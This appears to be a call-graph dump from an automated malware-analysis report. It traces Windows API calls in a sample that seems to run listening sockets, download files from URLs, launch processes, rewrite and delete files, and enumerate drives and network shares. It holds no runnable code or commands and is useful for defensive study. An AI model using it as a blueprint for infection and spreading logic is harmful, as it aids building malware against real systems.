7493->8562 7495 129291f Sleep 7495->7493 7507 12887d7 7496->7507 7497 12888e2 RtlExitUserThread 7498 128889a Sleep 7498->7507 7499 12888b8 Sleep 7501 1285760 10 API calls 7499->7501 7500 128883d 7500->7499 7500->7507 7503 12888ca 7501->7503 7502 128883f CreateThread 7504 12841c6 3 API calls 7502->7504 8623 12884c1 7502->8623 7506 12888d2 Sleep 7503->7506 7505 1288868 Sleep 7504->7505 7505->7507 7506->7507 7507->7497 7507->7498 7507->7499 7507->7500 7507->7502 7508 128887f Sleep 7507->7508 7508->7507 7510 12883fe htons bind 7509->7510 7512 12883f9 7509->7512 7511 1288438 listen 7510->7511 7510->7512 7511->7512 7513 128844d 7511->7513 7515 12884a9 RtlExitUserThread 7512->7515 7516 128849f closesocket 7512->7516 7513->7512 7514 1288456 accept 7513->7514 7518 1288473 CreateThread 7513->7518 7514->7513 7517 12884bb 7515->7517 7516->7515 7519 12841c6 3 API calls 7518->7519 8740 128828e 7518->8740 7520 1288494 7519->7520 7520->7513 7522 1298060 7521->7522 7523 1287a47 htons socket 7522->7523 7524 1287b20 setsockopt bind 7523->7524 7525 1287b1b 7523->7525 7524->7525 7532 1287b69 7524->7532 7527 1287c2a closesocket 7525->7527 7528 1287c37 RtlExitUserThread 7525->7528 7526 1287b76 GlobalAlloc recvfrom 7529 1287c0f GlobalFree 7526->7529 7530 1287be6 CreateThread 7526->7530 7527->7528 7533 1287c47 7528->7533 7529->7532 7531 12841c6 3 API calls 7530->7531 8743 128777d 7530->8743 7534 1287c0a 7531->7534 7532->7525 7532->7526 7534->7532 7536 1284275 7535->7536 7537 12842dc RtlExitUserThread 7536->7537 7538 12842cf Sleep 7536->7538 7539 12842a6 WaitForSingleObject 7536->7539 7540 12841c6 3 API calls 7536->7540 7538->7536 7539->7536 7540->7536 7541->7381 7543 128a28f SetFileAttributesA DeleteFileA 7542->7543 7544 128a277 7542->7544 7547 128a28d 7543->7547 7549 128e329 7544->7549 7547->7393 7548->7393 7550 128e353 7549->7550 7659 12844cb InterlockedExchange 7550->7659 7552 128e456 7660 12844cb InterlockedExchange 7552->7660 7554 128a284 7554->7543 7554->7547 7555 128e714 7556 128e71d MultiByteToWideChar 7555->7556 7557 128e753 RtlEnterCriticalSection 7555->7557 7558 128e748 7556->7558 7562 128e778 7557->7562 7558->7554 7558->7557 7559 128e6fd 7561 128a26e 6 API calls 7559->7561 7560 128e499 7560->7554 7560->7555 7560->7559 7561->7554 7563 128e7b6 GetLocalTime GetFileAttributesA SetFileAttributesA 7562->7563 7564 128e7f2 CreateFileA 7563->7564 7565 128e7e6 7563->7565 7566 128e81d GetFileSize 7564->7566 7567 128e832 7564->7567 7569 12908ef RtlLeaveCriticalSection 7565->7569 7570 12908de GlobalFree 7565->7570 7566->7567 7568 129088b CloseHandle SetFileAttributesA 7567->7568 7574 128e85f GetFileTime CreateFileMappingA 7567->7574 7571 12908af 7568->7571 7572 12908b5 DeleteFileA 7568->7572 7569->7554 7573 129090a Sleep 7569->7573 7570->7569 7571->7565 7571->7572 7572->7565 7573->7554 7575 128e8c2 MapViewOfFile 7574->7575 7580 128eb53 7574->7580 7575->7580 7588 128e8e4 7575->7588 7576 12907db CloseHandle 7576->7568 7577 12907f5 SetFilePointer SetEndOfFile 7576->7577 7578 129082b 7577->7578 7579 1290852 7577->7579 7578->7579 7581 1290831 WriteFile 7578->7581 7582 1290869 SetFileTime 7579->7582 7583 1290858 GlobalFree 7579->7583 7580->7576 7584 12907d1 UnmapViewOfFile 7580->7584 7585 1290793 GlobalAlloc 7580->7585 7587 12905ed 7580->7587 7581->7579 7582->7568 7583->7582 7584->7576 7585->7587 7586 129077f 7586->7584 7587->7586 7588->7580 7592 128e9ba 7588->7592 7807 12844cb InterlockedExchange 7588->7807 7590 128e997 7590->7592 7808 12844cb InterlockedExchange 7590->7808 7592->7580 7593 128ed26 lstrcpyn lstrcmpiA 7592->7593 7594 128ed5c 7593->7594 7594->7580 7595 128ee9a GlobalAlloc 7594->7595 7597 128eecf 7594->7597 7596 128eecc 7595->7596 7596->7597 7661 12844cb InterlockedExchange 7597->7661 7599 128f319 7600 128f925 7599->7600 7809 128cd03 7599->7809 7602 128f9a1 7600->7602 7606 128cd03 2 API calls 7600->7606 7603 128f9f8 7602->7603 7607 128cd03 2 API calls 7602->7607 7662 12844cb InterlockedExchange 7603->7662 7604 128f306 IsBadWritePtr 7604->7599 7613 128ef48 7604->7613 7606->7602 7607->7603 7608 128fa0e 7609 128fa55 7608->7609 7861 12844cb InterlockedExchange 7608->7861 7663 12844cb InterlockedExchange 7609->7663 7612 128fa82 7614 128cd03 2 API calls 7612->7614 7615 128fad5 7612->7615 7613->7580 7613->7599 7613->7604 7619 128f39d 7613->7619 7614->7615 7616 128cd03 2 API calls 7615->7616 7617 128fb50 7615->7617 7616->7617 7623 128fb9e 7617->7623 7862 128c76b 7617->7862 7620 128f4ce IsBadWritePtr 7619->7620 7625 128f4e1 7620->7625 7621 128fc7e 7664 12844cb InterlockedExchange 7621->7664 7623->7621 7624 128cd03 2 API calls 7623->7624 7624->7621 7626 128f579 IsBadWritePtr 7625->7626 7632 128f58c 7626->7632 7627 128fc94 7628 128fd1f 7627->7628 7629 128fd5c 7627->7629 7633 128cd03 2 API calls 7627->7633 7876 128b3ef 7628->7876 7629->7580 7665 128d34d 7629->7665 7634 128f5e4 IsBadWritePtr 7632->7634 7633->7628 7634->7599 7636 128f5fc IsBadWritePtr 7634->7636 7636->7599 7647 128f614 7636->7647 7637 128f634 IsBadWritePtr 7637->7599 7639 128f64c IsBadWritePtr 7637->7639 7638 128c89a 2 API calls 7649 128fe88 7638->7649 7639->7599 7639->7647 7640 128f705 IsBadWritePtr 7640->7599 7640->7647 7641 128f742 IsBadWritePtr 7641->7599 7641->7647 7642 128f76e lstrcmpiA 7643 128f7cd lstrcmpiA 7642->7643 7642->7647 7644 128f802 lstrcmpiA 7643->7644 7643->7647 7645 128f834 lstrcmpiA 7644->7645 7644->7647 7646 128f875 lstrcmpiA 7645->7646 7645->7647 7646->7647 7647->7599 7647->7637 7647->7640 7647->7641 7647->7642 7647->7643 7647->7644 7647->7645 7647->7646 7649->7580 7902 1286981 7649->7902 7650 12903c7 7651 12904a3 7650->7651 7913 12844cb InterlockedExchange 7651->7913 7653 12904ed GetTickCount 7654 12905c8 7653->7654 7655 129051a 7653->7655 7654->7580 7914 12844cb InterlockedExchange 7655->7914 7657 129051f 7657->7654 7915 12844cb InterlockedExchange 7657->7915 7659->7552 7660->7560 7661->7613 7662->7608 7663->7612 7664->7627 7666 128d3b6 7665->7666 7670 128d3e7 7666->7670 7949 12844cb InterlockedExchange 7666->7949 7668 128d45c 7916 12844cb InterlockedExchange 7668->7916 7670->7668 7672 128cd03 2 API calls 7670->7672 7671 128d47b 7673 128d4aa 7671->7673 7950 12844cb InterlockedExchange 7671->7950 7672->7670 7675 128c76b 2 API calls 7673->7675 7676 128d4e3 7675->7676 7677 128c76b 2 API calls 7676->7677 7678 128d50b 7677->7678 7917 12844cb InterlockedExchange 7678->7917 7680 128d535 7681 128d564 7680->7681 7951 12844cb InterlockedExchange 7680->7951 7683 128c76b 2 API calls 7681->7683 7684 128d58b 7683->7684 7685 128c76b 2 API calls 7684->7685 7686 128d5c8 7685->7686 7687 128b3ef InterlockedExchange 7686->7687 7688 128d603 7687->7688 7918 12844cb InterlockedExchange 7688->7918 7690 128d613 7919 128b354 7690->7919 7694 128d659 7695 128d688 7694->7695 7952 12844cb InterlockedExchange 7694->7952 7697 128c76b 2 API calls 7695->7697 7698 128d6b9 7697->7698 7929 12844cb InterlockedExchange 7698->7929 7700 128d6cf 7701 128d706 7700->7701 7953 12844cb InterlockedExchange 7700->7953 7703 128c76b 2 API calls 7701->7703 7704 128d749 7703->7704 7705 128b3ef InterlockedExchange 7704->7705 7706 128d7b6 7705->7706 7930 128d1b9 7706->7930 7708 128d7dc 7709 128b3ef InterlockedExchange 7708->7709 7710 128d7fc 7709->7710 7711 128c76b 2 API calls 7710->7711 7712 128d824 7711->7712 7713 128b3ef InterlockedExchange 7712->7713 7714 128d87f 7713->7714 7943 12844cb InterlockedExchange 7714->7943 7716 128d8a9 7718 128d8e8 7716->7718 7954 12844cb InterlockedExchange 7716->7954 7719 128c76b 2 API calls 7718->7719 7720 128d925 7719->7720 7944 12844cb InterlockedExchange 7720->7944 7722 128d935 7724 128d974 7722->7724 7955 12844cb InterlockedExchange 7722->7955 7725 128c76b 2 API calls 7724->7725 7726 128d9b7 7725->7726 7727 128b3ef InterlockedExchange 7726->7727 7728 128d9d7 7727->7728 7729 128b3ef InterlockedExchange 7728->7729 7730 128da11 7729->7730 7731 128d1b9 2 API calls 7730->7731 7732 128da37 7731->7732 7733 128b3ef InterlockedExchange 7732->7733 7734 128da57 7733->7734 7735 128d1b9 2 API calls 7734->7735 7736 128da7d 7735->7736 7737 128b3ef InterlockedExchange 7736->7737 7738 128dac3 7737->7738 7739 128c76b 2 API calls 7738->7739 7740 128daeb 7739->7740 7945 12844cb InterlockedExchange 7740->7945 7742 128dafb 7744 128db3a 7742->7744 7956 12844cb InterlockedExchange 7742->7956 7745 128c76b 2 API calls 7744->7745 7746 128db92 7745->7746 7747 128c76b 2 API calls 7746->7747 7748 128dc05 7747->7748 7749 128c76b 2 API calls 7748->7749 7750 128dc2d 7749->7750 7946 12844cb InterlockedExchange 7750->7946 7752 128dc3d 7754 128dc7c 7752->7754 7957 12844cb InterlockedExchange 7752->7957 7755 128c76b 2 API calls 7754->7755 7756 128dcc9 7755->7756 7757 128b3ef InterlockedExchange 7756->7757 7758 128dd36 7757->7758 7759 128d1b9 2 API calls 7758->7759 7760 128dd5c 7759->7760 7761 128b3ef InterlockedExchange 7760->7761 7762 128dd7c 7761->7762 7763 128b3ef InterlockedExchange 7762->7763 7764 128ddd2 7763->7764 7765 128b3ef InterlockedExchange 7764->7765 7766 128de2d 7765->7766 7767 128c76b 2 API calls 7766->7767 7768 128de8b 7767->7768 7769 128c76b 2 API calls 7768->7769 7770 128deb3 7769->7770 7947 12844cb InterlockedExchange 7770->7947 7772 128dec3 7774 128df0a 7772->7774 7958 12844cb InterlockedExchange 7772->7958 7775 128c76b 2 API calls 7774->7775 7776 128df61 7775->7776 7777 128b3ef InterlockedExchange 7776->7777 7778 128df81 7777->7778 7779 128b3ef InterlockedExchange 7778->7779 7780 128dfee 7779->7780 7781 128d1b9 2 API calls 7780->7781 7782 128e014 7781->7782 7783 128b3ef InterlockedExchange 7782->7783 7784 128e034 7783->7784 7785 128c76b 2 API calls 7784->7785 7786 128e05a 7785->7786 7787 128c76b 2 API calls 7786->7787 7788 128e082 7787->7788 7948 12844cb InterlockedExchange 7788->7948 7791 128e0cd 7792 128e114 7791->7792 7959 12844cb InterlockedExchange 7791->7959 7793 128c76b 2 API calls 7792->7793 7794 128e16b 7793->7794 7795 128c76b 2 API calls 7794->7795 7796 128e193 7795->7796 7797 128c76b 2 API calls 7796->7797 7798 128e1bb 7797->7798 7799 128c76b 2 API calls 7798->7799 7800 128e1e1 7799->7800 7801 128c76b 2 API calls 7800->7801 7802 128e20a 7801->7802 7803 128c76b 2 API calls 7802->7803 7804 128e28f 7803->7804 7805 128c76b 2 API calls 7804->7805 7806 128e2c4 7805->7806 7806->7580 7806->7638 7807->7590 7808->7592 7810 128cd58 7809->7810 7811 128cd47 7809->7811 7977 12844cb InterlockedExchange 7810->7977 7965 128cb12 7811->7965 7814 128cd68 7815 128ce2c 7814->7815 7978 128cc78 7814->7978 7817 128ce62 7815->7817 7819 128cb12 InterlockedExchange 7815->7819 7988 12844cb InterlockedExchange 7817->7988 7819->7817 7822 128d1a7 7822->7600 7823 128cdac 7825 128cdd9 7823->7825 7826 128cdc2 7823->7826 7824 128cb12 InterlockedExchange 7824->7822 7986 12844cb InterlockedExchange 7825->7986 7985 12844cb InterlockedExchange 7826->7985 7827 128ce72 7830 128cc78 InterlockedExchange 7827->7830 7860 128d060 7827->7860 7832 128cea5 7830->7832 7831 128cdc7 7987 12844cb InterlockedExchange 7831->7987 7832->7860 7989 12844cb InterlockedExchange 7832->7989 7835 128ceca 7990 12844cb InterlockedExchange 7835->7990 7836 128ce09 7837 128c76b 2 API calls 7836->7837 7837->7815 7839 128ceea 7840 128cf2b 7839->7840 7841 128cf04 7839->7841 7843 128c76b 2 API calls 7840->7843 7842 128b354 2 API calls 7841->7842 7844 128cf1a 7842->7844 7843->7844 7991 12844cb InterlockedExchange 7844->7991 7846 128cf66 7847 128c76b 2 API calls 7846->7847 7848 128cf78 7846->7848 7847->7848 7849 128cfe8 7848->7849 7850 128cfff 7848->7850 7992 12844cb InterlockedExchange 7849->7992 7993 12844cb InterlockedExchange 7850->7993 7853 128cfed 7854 128c76b 2 API calls 7853->7854 7855 128d037 7854->7855 7856 128d050 7855->7856 7857 128d0f1 7855->7857 7856->7860 7994 12844cb InterlockedExchange 7856->7994 7857->7860 7995 12844cb InterlockedExchange 7857->7995 7860->7822 7860->7824 7861->7608 7863 128b3ef InterlockedExchange 7862->7863 7864 128c78a 7863->7864 7865 128c7cb 7864->7865 7866 128c79b 7864->7866 7868 128c7fe 7865->7868 7869 128c7d1 7865->7869 8007 128b614 7866->8007 7872 128c82f 7868->7872 7873 128c804 7868->7873 8057 128bfb2 7869->8057 7870 128c7bb 7870->7623 7872->7870 8097 128c61c 7872->8097 8086 128c459 7873->8086 7877 128b425 7876->7877 7890 128b41e 7876->7890 8121 12844cb InterlockedExchange 7877->8121 7879 128b431 7893 128b45e 7879->7893 8122 12844cb InterlockedExchange 7879->8122 7882 128b574 7886 128b59e 7882->7886 7882->7890 8131 12844cb InterlockedExchange 7882->8131 7883 128b44c 7883->7893 8123 12844cb InterlockedExchange 7883->8123 7885 128b47a 7900 128b4f4 7885->7900 8124 12844cb InterlockedExchange 7885->8124 8132 12844cb InterlockedExchange 7886->8132 7890->7629 7892 128b495 8125 12844cb InterlockedExchange 7892->8125 8130 12844cb InterlockedExchange 7893->8130 7895 128b4aa 8126 12844cb InterlockedExchange 7895->8126 7897 128b4bf 7898 128b4ee 7897->7898 8127 12844cb InterlockedExchange 7897->8127 7898->7900 8128 12844cb InterlockedExchange 7898->8128 8129 12844cb InterlockedExchange 7900->8129 8133 12844cb InterlockedExchange 7902->8133 7904 1286990 7905 12869e9 7904->7905 7906 1286cdf 7904->7906 7907 1286d75 7904->7907 7905->7650 7908 1286d3b 7906->7908 7909 1286cec 7906->7909 7907->7905 8134 12860d9 7907->8134 7910 1284503 InterlockedExchange 7908->7910 7911 1284503 InterlockedExchange 7909->7911 7910->7905 7911->7905 7913->7653 7914->7657 7915->7657 7916->7671 7917->7680 7918->7690 7960 12844cb InterlockedExchange 7919->7960 7921 128b366 7961 12844cb InterlockedExchange 7921->7961 7923 128b37b 7924 128b39c 7923->7924 7925 128b38d GetTickCount 7923->7925 7926 128c76b InterlockedExchange 7924->7926 7925->7924 7927 128b3b7 7926->7927 7928 12844cb InterlockedExchange 7927->7928 7928->7694 7929->7700 7931 128d1f4 7930->7931 7932 128d346 7931->7932 7933 128d20e 7931->7933 7962 12844cb InterlockedExchange 7931->7962 7932->7708 7963 12844cb InterlockedExchange 7933->7963 7936 128d273 7938 128c76b 2 API calls 7936->7938 7939 128d298 7936->7939 7937 128d232 7937->7936 7964 12844cb InterlockedExchange 7937->7964 7938->7939 7941 128b3ef InterlockedExchange 7939->7941 7942 128d336 7941->7942 7942->7708 7943->7716 7944->7722 7945->7742 7946->7752 7947->7772 7948->7791 7949->7666 7950->7671 7951->7680 7952->7694 7953->7700 7954->7716 7955->7722 7956->7742 7957->7752 7958->7772 7959->7791 7960->7921 7961->7923 7962->7933 7963->7937 7964->7936 7966 128b3ef InterlockedExchange 7965->7966 7967 128cb4b 7966->7967 7996 12844cb InterlockedExchange 7967->7996 7969 128cb5f 7970 128cc4b 7969->7970 7997 12844cb InterlockedExchange 7969->7997 7972 128b3ef InterlockedExchange 7970->7972 7973 128cc62 7972->7973 7973->7810 7974 12844cb InterlockedExchange 7976 128cb7a 7974->7976 7976->7970 7976->7974 7998 1284503 7976->7998 7977->7814 7979 128cc92 7978->7979 7982 128ccf8 7978->7982 7979->7982 8005 12844cb InterlockedExchange 7979->8005 7981 128ccc0 7981->7982 8006 12844cb InterlockedExchange 7981->8006 7982->7815 7984 12844cb InterlockedExchange 7982->7984 7984->7823 7985->7831 7986->7831 7987->7836 7988->7827 7989->7835 7990->7839 7991->7846 7992->7853 7993->7853 7994->7860 7995->7860 7996->7969 7997->7976 8003 12844cb InterlockedExchange 7998->8003 8000 128450c 8004 12844cb InterlockedExchange 8000->8004 8002 128451a 8002->7976 8003->8000 8004->8002 8005->7981 8006->7981 8008 128b64a 8007->8008 8009 128b3ef InterlockedExchange 8008->8009 8010 128b67b 8009->8010 8102 12844cb InterlockedExchange 8010->8102 8013 128b913 8055 128ba0a 8013->8055 8104 12844cb InterlockedExchange 8013->8104 8014 128b3ef InterlockedExchange 8015 128ba31 8014->8015 8017 128be04 8015->8017 8018 128ba46 8015->8018 8016 128b68b 8020 12844cb InterlockedExchange 8016->8020 8045 128b75e 8016->8045 8048 1284503 InterlockedExchange 8016->8048 8053 128badc 8017->8053 8112 12844cb InterlockedExchange 8017->8112 8106 12844cb InterlockedExchange 8018->8106 8020->8016 8021 128ba4b 8022 128bd22 8021->8022 8023 128ba75 8021->8023 8024 128bb06 8021->8024 8041 128bcb3 8021->8041 8021->8053 8025 128bd28 8022->8025 8026 128bd5f 8022->8026 8038 128b3ef InterlockedExchange 8023->8038 8027 128b354 2 API calls 8024->8027 8030 128bfb2 2 API calls 8025->8030 8031 128bd68 8026->8031 8032 128bd7f 8026->8032 8033 128bb1a 8027->8033 8028 128bf63 8028->7870 8030->8053 8110 12844cb InterlockedExchange 8031->8110 8111 12844cb InterlockedExchange 8032->8111 8039 128b3ef InterlockedExchange 8033->8039 8034 128b3ef InterlockedExchange 8034->8028 8038->8053 8043 128bb3a 8039->8043 8040 128b995 8051 128b9d5 8040->8051 8105 12844cb InterlockedExchange 8040->8105 8041->8053 8109 12844cb InterlockedExchange 8041->8109 8042 128bd6d 8056 128b3ef InterlockedExchange 8042->8056 8046 128bb4b 8043->8046 8047 128bb85 8043->8047 8103 12844cb InterlockedExchange 8045->8103 8107 12844cb InterlockedExchange 8046->8107 8108 12844cb InterlockedExchange 8047->8108 8048->8016 8054 128b614 2 API calls 8051->8054 8053->8028 8053->8034 8054->8055 8055->8014 8056->8053 8058 128b3ef InterlockedExchange 8057->8058 8059 128bffe 8058->8059 8113 12844cb InterlockedExchange 8059->8113 8061 128b3ef InterlockedExchange 8062 128c136 8061->8062 8066 128c1b8 8062->8066 8116 12844cb InterlockedExchange 8062->8116 8064 128c00e 8085 128c10f 8064->8085 8114 12844cb InterlockedExchange 8064->8114 8065 128c18a 8065->8066 8068 128c2a3 8065->8068 8072 128c1f2 8065->8072 8070 128c40e 8066->8070 8073 128b3ef InterlockedExchange 8066->8073 8069 128b354 2 API calls 8068->8069 8074 128c2b7 8069->8074 8070->7870 8071 128c092 8079 128c0da 8071->8079 8115 12844cb InterlockedExchange 8071->8115 8077 128b3ef InterlockedExchange 8072->8077 8073->8070 8075 128b3ef InterlockedExchange 8074->8075 8078 128c2d7 8075->8078 8077->8066 8080 128c2e8 8078->8080 8081 128c322 8078->8081 8082 128bfb2 2 API calls 8079->8082 8117 12844cb InterlockedExchange 8080->8117 8118 12844cb InterlockedExchange 8081->8118 8082->8085 8085->8061 8087 128b3ef InterlockedExchange 8086->8087 8088 128c490 8087->8088 8096 128c4bc 8088->8096 8119 12844cb InterlockedExchange 8088->8119 8090 128c4aa 8091 128b354 2 API calls 8090->8091 8090->8096 8092 128c4f6 8091->8092 8120 12844cb InterlockedExchange 8092->8120 8093 128c60a 8093->7870 8095 128b3ef InterlockedExchange 8095->8093 8096->8093 8096->8095 8098 128b3ef InterlockedExchange 8097->8098 8099 128c653 8098->8099 8100 128b3ef InterlockedExchange 8099->8100 8101 128c759 8099->8101 8100->8101 8101->7870 8102->8016 8103->8013 8104->8040 8105->8040 8106->8021 8107->8053 8108->8053 8109->8053 8110->8042 8111->8042 8112->8053 8113->8064 8114->8071 8115->8071 8116->8065 8117->8066 8118->8066 8119->8090 8120->8096 8121->7879 8122->7883 8123->7885 8124->7892 8125->7895 8126->7897 8127->7897 8128->7900 8129->7893 8130->7882 8131->7886 8132->7890 8133->7904 8135 1286132 8134->8135 8137 12861f2 8135->8137 8138 12844cb InterlockedExchange 8135->8138 8137->7905 8138->8137 8139->7399 8141 128a7b8 8140->8141 8142 128a7a9 lstrcat 8140->8142 8192 128a16b 8141->8192 8142->8141 8144 128a7c4 lstrcpy 8197 12844cb InterlockedExchange 8144->8197 8146 128a7da 8147 128a7ec lstrlen wsprintfA 8146->8147 8148 128a814 lstrlen wsprintfA 8146->8148 8149 128a83b 8147->8149 8148->8149 8149->7405 8200 128a677 8150->8200 8152 1290b8f 8152->7405 8154 1290a0a InternetOpenA 8155 1290a31 InternetOpenUrlA 8154->8155 8156 1290b63 8154->8156 8155->8156 8157 1290a63 8155->8157 8158 1290b79 8156->8158 8159 1290b6c InternetCloseHandle 8156->8159 8160 1290a69 CreateFileA 8157->8160 8161 1290a8b InternetReadFile 8157->8161 8158->8152 8162 1290b82 InternetCloseHandle 8158->8162 8159->8158 8160->8161 8166 1290ab3 8161->8166 8162->8152 8163 1290b56 CloseHandle 8163->8156 8164 1290acf WriteFile 8164->8166 8165 1290b15 8165->8163 8166->8161 8166->8163 8166->8164 8166->8165 8168 1291536 GlobalAlloc ReadFile lstrlen 8167->8168 8169 129152f 8167->8169 8170 1291587 8168->8170 8169->7405 8171 129159d lstrlen 8170->8171 8172 1291730 8170->8172 8178 12915c4 8171->8178 8172->8169 8173 1291736 GlobalFree 8172->8173 8173->8169 8174 12915fe lstrlen 8174->8178 8175 1291641 SetFilePointer WriteFile SetFilePointer SetEndOfFile CloseHandle 8176 12916b8 8175->8176 8177 12916c4 8175->8177 8176->8177 8179 12916e5 8176->8179 8180 12916ca GlobalFree 8177->8180 8181 12916d4 DeleteFileA 8177->8181 8178->8172 8178->8174 8178->8175 8182 1284631 3 API calls 8179->8182 8180->8181 8181->8169 8183 12916ee Sleep CreateThread 8182->8183 8184 12841c6 3 API calls 8183->8184 8212 128a1f2 lstrcpy 8183->8212 8185 1291722 Sleep 8184->8185 8185->8172 8187 128460b WriteFile CloseHandle 8186->8187 8188 128462d 8186->8188 8187->8188 8188->7411 8190 128470c CreateProcessA 8189->8190 8190->7414 8198 12844cb InterlockedExchange 8192->8198 8194 128a1dd lstrcpy 8194->8144 8196 128a192 8196->8194 8199 12844cb InterlockedExchange 8196->8199 8197->8146 8198->8196 8199->8196 8202 128a68a 8200->8202 8201 128a757 8201->8152 8201->8154 8202->8201 8203 128a6b0 8202->8203 8204 128a70f GetTickCount 8203->8204 8205 128a6c5 GetTickCount 8203->8205 8211 12844cb InterlockedExchange 8204->8211 8210 12844cb InterlockedExchange 8205->8210 8208 128a6d2 GetTickCount lstrlen wsprintfA 8208->8201 8209 128a71c GetTickCount lstrlen wsprintfA 8209->8201 8210->8208 8211->8209 8213 128a226 8212->8213 8214 128a25d RtlExitUserThread 8213->8214 8215 128a22f GetFileAttributesA 8213->8215 8216 128a241 8215->8216 8217 128a243 DeleteFileA Sleep 8215->8217 8216->8214 8217->8213 8219 1298060 8218->8219 8220 1293787 GlobalAlloc 8219->8220 8221 129381f 8220->8221 8267 1292fff 8221->8267 8223 128e329 48 API calls 8224 129382e 8223->8224 8224->8223 8225 129384d Sleep 8224->8225 8227 129385a 8224->8227 8225->8224 8228 12938a2 8227->8228 8272 12844cb InterlockedExchange 8227->8272 8228->7426 8230 129192e 8229->8230 8235 1291828 8229->8235 8230->7438 8231 1291843 RegEnumValueA 8232 129191a RegCloseKey 8231->8232 8231->8235 8232->8230 8234 12918bd lstrlen lstrlen 8234->8235 8235->8231 8235->8234 8236 128e329 48 API calls 8235->8236 8237 129190a Sleep 8236->8237 8237->8235 8239 1291a42 GlobalAlloc 8238->8239 8240 1291a26 8238->8240 8244 1291a5a 8239->8244 8240->7440 8241 1291c9d GlobalFree WNetCloseEnum 8241->8240 8242 1291a79 WNetEnumResourceA 8243 1291c7e GetLastError 8242->8243 8242->8244 8245 1291c8b 8243->8245 8246 1291c8d Sleep 8243->8246 8244->8241 8244->8242 8244->8246 8247 1291acf 8244->8247 8245->8241 8246->8244 8248 1291c77 8247->8248 8249 1291c51 8247->8249 8250 1291b14 lstrcpy lstrcat 8247->8250 8248->7440 8252 129195d 103 API calls 8249->8252 8251 1290b9a 7 API calls 8250->8251 8254 1291b47 8251->8254 8253 1291c69 Sleep 8252->8253 8253->8248 8254->8249 8255 1291b6b lstrcpy lstrlen 8254->8255 8256 1291bf1 8254->8256 8258 1291ba8 lstrlen 8255->8258 8259 1291b96 lstrcat 8255->8259 8257 1291c38 8256->8257 8263 1291c0f lstrlen 8256->8263 8257->8249 8261 1291c44 DeleteFileA 8257->8261 8260 128a16b 2 API calls 8258->8260 8259->8258 8262 1291bc2 lstrcat 8260->8262 8261->8249 8273 1290c4b 8262->8273 8279 1291060 Sleep 8263->8279 8268 128a75a 10 API calls 8267->8268 8269 1293015 CreateFileA 8268->8269 8270 129303a WriteFile CloseHandle 8269->8270 8271 129305e 8269->8271 8270->8271 8271->8224 8272->8227 8274 1290c6a lstrlen 8273->8274 8275 1290c61 8274->8275 8276 1290c8d CreateFileA 8274->8276 8275->8274 8278 1290c87 8275->8278 8277 1290caf WriteFile CloseHandle GetFileAttributesA 8276->8277 8276->8278 8277->8278 8278->8256 8280 12910ec 8279->8280 8281 12910d4 lstrcat 8279->8281 8282 1291101 8280->8282 8283 1291117 lstrcat FindFirstFileA 8280->8283 8281->8280 8282->8257 8284 1291170 8283->8284 8285 1291141 FindNextFileA 8283->8285 8287 1291492 8284->8287 8292 129146f 8284->8292 8285->8284 8286 1291157 8285->8286 8286->8284 8286->8285 8290 129117b Sleep 8286->8290 8291 129119f lstrlen 8286->8291 8298 12913aa lstrcpy lstrlen lstrcmpiA 8286->8298 8299 128e329 48 API calls 8286->8299 8300 1291060 71 API calls 8286->8300 8301 1291355 8286->8301 8302 128a26e 48 API calls 8286->8302 8304 12912f2 lstrcpy lstrcat 8286->8304 8288 12914bb Sleep 8287->8288 8289 12914b1 FindClose 8287->8289 8288->8282 8289->8288 8290->8291 8291->8286 8293 12911c7 lstrcat lstrlen lstrlen 8291->8293 8319 1290e71 8292->8319 8293->8286 8295 1291207 lstrcmpiA 8293->8295 8295->8286 8297 129121e lstrcmpiA 8295->8297 8297->8286 8298->8286 8299->8286 8300->8286 8301->8286 8305 129136a DeleteFileA 8301->8305 8306 1290cf6 CreateFileA 8301->8306 8302->8286 8304->8286 8305->8301 8307 1290e6a 8306->8307 8308 1290d45 GetFileSize 8306->8308 8307->8301 8309 1290d61 GlobalAlloc ReadFile 8308->8309 8310 1290e60 CloseHandle 8308->8310 8311 1290da1 8309->8311 8310->8307 8312 1290dac CreateFileW 8311->8312 8313 1290e56 GlobalFree 8311->8313 8312->8313 8314 1290ddb GetFileSize 8312->8314 8313->8310 8315 1290e4c CloseHandle 8314->8315 8316 1290df3 GlobalAlloc ReadFile 8314->8316 8315->8313 8317 1290e34 8316->8317 8318 1290e42 GlobalFree 8317->8318 8318->8315 8320 1298060 8319->8320 8321 1290e7e lstrcpy 8320->8321 8322 1290f1a lstrlen 8321->8322 8323 1290f03 8321->8323 8325 128a16b 2 API calls 8322->8325 8338 12844cb InterlockedExchange 8323->8338 8327 1290f34 lstrcat 8325->8327 8326 1290f08 8326->8322 8328 1290f4b 8326->8328 8329 1290f76 MultiByteToWideChar CreateFileA 8327->8329 8339 12844cb InterlockedExchange 8328->8339 8330 1290fc1 lstrlenW 8329->8330 8331 1291055 8329->8331 8340 129772b 8330->8340 8331->8287 8334 1290f50 lstrcat 8334->8329 8336 129772b 8337 1291017 WriteFile CloseHandle 8336->8337 8337->8331 8338->8326 8339->8334 8341 1290ff1 lstrlenW 8340->8341 8341->8336 8343 1298060 8342->8343 8344 1291cf0 lstrcpy GetDriveTypeA 8343->8344 8345 1291d7e RtlExitUserThread 8344->8345 8346 1291d60 8344->8346 8347 1291060 91 API calls 8346->8347 8348 1291d7b 8347->8348 8348->8345 8350 1291ea9 8349->8350 8351 1291ee8 RtlExitUserThread 8350->8351 8394 1291d8f RegOpenKeyExA 8350->8394 8353 1291ebe Sleep 8354 1291d8f 53 API calls 8353->8354 8355 1291ed8 Sleep 8354->8355 8355->8350 8357 129308c 8356->8357 8403 12844cb InterlockedExchange 8357->8403 8359 1293162 Sleep 8360 1292fff 13 API calls 8359->8360 8362 1293188 8360->8362 8361 128e329 48 API calls 8361->8362 8362->8361 8363 12931a7 Sleep 8362->8363 8366 12931b4 8362->8366 8363->8362 8364 1293744 RtlExitUserThread 8366->8364 8367 1292ebc 11 API calls 8366->8367 8369 1293734 Sleep 8366->8369 8370 1293278 GetDriveTypeA 8366->8370 8368 129320b Sleep GetLogicalDrives 8367->8368 8368->8366 8369->8366 8370->8366 8371 12932bc lstrcat CreateFileA 8370->8371 8372 12932ff GetFileTime FileTimeToSystemTime 8371->8372 8373 1293522 GetFileAttributesA 8371->8373 8376 1293515 CloseHandle 8372->8376 8390 129333d 8372->8390 8374 1293569 CreateFileA 8373->8374 8375 129353e SetFileAttributesA DeleteFileA 8373->8375 8374->8366 8378 1293598 GetSystemTime SystemTimeToFileTime 8374->8378 8441 128a2ad SHFileOperation RemoveDirectoryA 8375->8441 8376->8373 8380 128a16b 2 API calls 8378->8380 8379 1293566 8379->8374 8386 1293605 8380->8386 8381 1293372 